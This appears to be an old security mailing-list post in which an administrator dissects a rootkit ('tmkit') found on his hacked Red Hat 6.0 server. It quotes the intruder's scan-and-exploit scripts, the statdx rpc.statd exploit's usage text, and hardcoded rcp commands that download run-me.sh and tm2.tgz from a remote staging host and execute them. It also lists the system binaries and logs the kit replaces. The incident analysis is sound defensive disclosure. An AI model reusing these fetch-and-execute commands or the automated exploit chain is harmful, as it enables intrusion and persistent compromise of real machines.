^Madereet (or tmkit)

[Kristinn Torfason <kritor () MOBILESTOP COM>]

This concerns what seems to go by the name ^Madereet (or maybe more properly 'tmkit').

Around October 23rd my site, which was running an old Rh 6.0 installation, got hacked.
I don't know which hole the hacker used to break in but here is some information on
what he left behind, and how I noticed my systems had been compromized.

I noticed when issuing a ps command that it did not produce results in the format
I expected. A quick search for ps produced a copy in /dev/^Madereet/.backup at which
point I disconnected the network cable after issuing who, last, a history command and
looking at some of my logs. Only the logs provided some clues to what seemed to
have been a portscan.

After examining the bogus ps binary I decided to try running the one in the
/dev/^Madereet/.backup directory. That one seemed to be the original one, for it produced
the format I am used to seeing and also showed me a process 'synscan' running, which
I regretfully killed immetiately. I should have attemted to examine if this thingy had any
connections going.

The /dev/^Madereet directory contained a '.backup' directory and a 'other' directory. The
'.backup' diectory contained the files inetd, inetd.conf, netstat, and  ps which
seemed to be backups of the original (normal) ones.

The 'other' directory contained the following files :

        28.done: ASCII text
        autohax: ELF 32-bit LSB executable
        start.pl: perl commands text
        statd:  ELF 32-bit LSB executable
        synscan: ELF 32-bit LSB executable
        do.sh: Bourne shell script text

The '28.done' file contained one line-feed character.

The 'start.pl' file contained the following :

        #!/usr/bin/perl
        $random = int( rand(230)) + 4;
        system("./synscan '$random' '$random.statd' eth0 100 111");
        system("./do.sh '$random'");

The 'do.sh' file contained the following :

        #!/bin/sh
        cat $1.statd | grep statd > $1.new
        rm $1.statd
        cat $1.new | cut -f1 -d'(' >$1.done
        rm $1.new
        nohup ./autohax $1.done &

A closer examiniation of the contents of the files left in /dev/^Madereet/other directory led to
some further information. An examination of the 'statd' binary there, simply using vi, disclosed
the following text :

statdx by ron1n shellcode () hotmail com
Usage: %s [-t] [-p port] [-a addr] [-l len]
        [-o offset] [-w num] [-s secs] [-d type] <target>
        -t attack a tcp dispatcher [udp]

        [-o offset] [-w num] [-s secs] [-d type] <target>
        -t attack a tcp dispatcher [udp]
        -p rpc.statd serves requests on <port> [query]
        -a the stack address of the buffer is <addr>
        -l the length of the buffer is <len> [1024]
        -o the offset to return to is <offset> [600]
        -w the number of dwords to wipe is <num> [9]
        -s set timeout in seconds to <secs> [5]
        -d use a hardcoded <type>
        Available types:
        %d    %s

This was followed by something quite interesting (I've replaced the actual IP with x's and the
user name with fubar) :

        rcp fubar () xxx xxx xx xx:/dev/ptyp/run-me.sh ./;chmod +x run-me.sh;nohup ./run-me.sh &

.. and then by the following text :

        OMG! You now have rpc.statd technique!

The hardcoded rcp command immediately caught my attention, so I hooked up the network cable
again and gave it a spin :

        rcp fubar () xxx xxx xx xx:/dev/ptyp/run-me.sh ./

.. which indeed got me a file called 'run-me.sh' which contained :

        #!/bin/sh
        rcp fubar () xxx xxx xx xx:/dev/ptyp/tm2.tgz ./;tar xzvf tm2.tgz;cd tm2
        ./setup

.. so I continued and did :

        rcp fubar () xxx xxx xx xx:/dev/ptyp/tm2.tgz ./

.. which got me the file 'tm2.tgz'.

This turnes out to contain a base package similar to the one the hacker installed on my machine.

The machine hosting the 'fubar' account is a Solaris machine in Canada, and I think that machine
has been hacked, and now seems to serve as some kind of platform for the hacker(s). The 'fubar'
account on that machine seems to be wide open for rcp at least (planted .rhosts file?).

At this point, I have upgraded my gateway machine and shut all ports except 22 and 80,
and continue examining the 'tm2.tgz' package more closely. A first preliminary examination of
the package shows that it creates/modifies/exchanges the following files :

        /etc/inetd.conf, /usr/sbin/time, /bin/lpr, /bin/ps, /bin/netstat,
        /usr/sbin/inetd, /bin/ls, /var/log/secure, /var/log/messages,
        /sbin/rpc.statd, /dev/hdbp, /dev/hdaq, /dev/^Madereet,
        /dev/^Madereet/.backup, /dev/^Madereet/other, /var/named/ADMROCKS.

I would appreciate any comments, suggestions or feedback.

Best regards,
Kristinn Torfason
quirc () quirc com